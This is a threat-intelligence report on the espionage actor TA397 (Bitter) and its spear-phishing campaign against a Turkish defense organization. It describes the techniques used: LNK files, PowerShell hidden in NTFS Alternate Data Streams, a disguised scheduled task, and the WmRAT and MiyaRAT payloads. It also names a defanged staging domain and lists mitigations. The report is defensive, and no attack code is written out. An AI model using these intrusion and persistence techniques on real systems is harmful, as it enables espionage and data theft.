Full Report
Sophisticated phishing attack targeting Turkey’s defense sector revealed TA397’s advanced tactics
Analysis Summary
# Threat Actor: TA397 (Bitter)
## Attribution & Identity
**Threat Actor:** TA397
**Known Aliases:** Bitter
**Association:** Attributed to espionage efforts likely supporting a South Asian government, based on historical targeting and operational hours (UTC+5:30 working hours).
## Activity Summary
The actor was observed conducting a sophisticated spear-phishing campaign targeting a Turkish defense sector organization. This campaign utilized socially engineered lures related to public sector infrastructure projects ("PUBLIC INVESTMENTS PROJECTS 2025 \_ MADAGASCAR"). The activity involved multi-stage execution using LNK files, hidden NTFS Alternate Data Streams (ADS), and scheduled tasks to establish persistence and deploy RATs. Historical activities show targeting of defense and public sector organizations across EMEA and APAC regions.
## Tactics, Techniques & Procedures
- **Initial Access:** Spear-phishing emails delivering RAR archives.
- **Execution & Defense Evasion:** Using LNK files to execute hidden PowerShell commands stored within NTFS Alternate Data Streams (ADS) titled "Participation."
- **Persistence:** Creation of a scheduled task named "DsSvcCleanup" that runs every 17 minutes to beacon beacon out machine data.
- **Command and Control:** Utilizing C2 domains for communication and staging.
- **Payload Delivery:** Deploying final payloads (WmRAT and MiyaRAT) via downloaded MSI installers in a manual response to initial beaconing.
- [No specific MITRE ATT&CK IDs were mentioned in the text.]
## Targeting
**Sectors:** Defense sector, public sector organizations, organizations involved in infrastructure projects.
**Geography:** Turkey (observed victim); historical targeting includes EMEA and APAC regions.
**Victims:** A Turkish defense sector organization.
## Tools & Infrastructure
**Malware Families Used:**
- **WmRAT:** Written in C++, capable of file exfiltration, running arbitrary commands, and taking screenshots.
- **MiyaRAT:** Written in C++, featuring refined capabilities including reverse shells and advanced directory enumeration (reserved for high-value targets).
**Infrastructure (C2, domains, IPs):**
- Staging Domain: jacknwoods\[.\]com
## Implications
TA397 demonstrates sophisticated tradecraft, specifically utilizing NTFS ADS for payload staging/execution and scheduled tasks for robust persistence. Their focus on defense contractors and public investment projects suggests intelligence gathering crucial to state-level actors. The manual response and use of two distinct RATs (one reserved for higher-value targets) indicate a well-resourced operation.
## Mitigations
- Employ robust email filtering to detect and block suspicious attachments, especially RAR archives with embedded shortcuts.
- Monitor for unusual scheduled task creation, particularly those beaconing data externally (e.g., "DsSvcCleanup").
- Implement detection for the use of PowerShell commands executed from NTFS Alternate Data Streams.
- Harden RDP/remote access controls, as the deployment of RATs implies a goal of remote persistent access.
- Block command and control communication to known or suspected TA397 infrastructure, such as jacknwoods\[.\]com.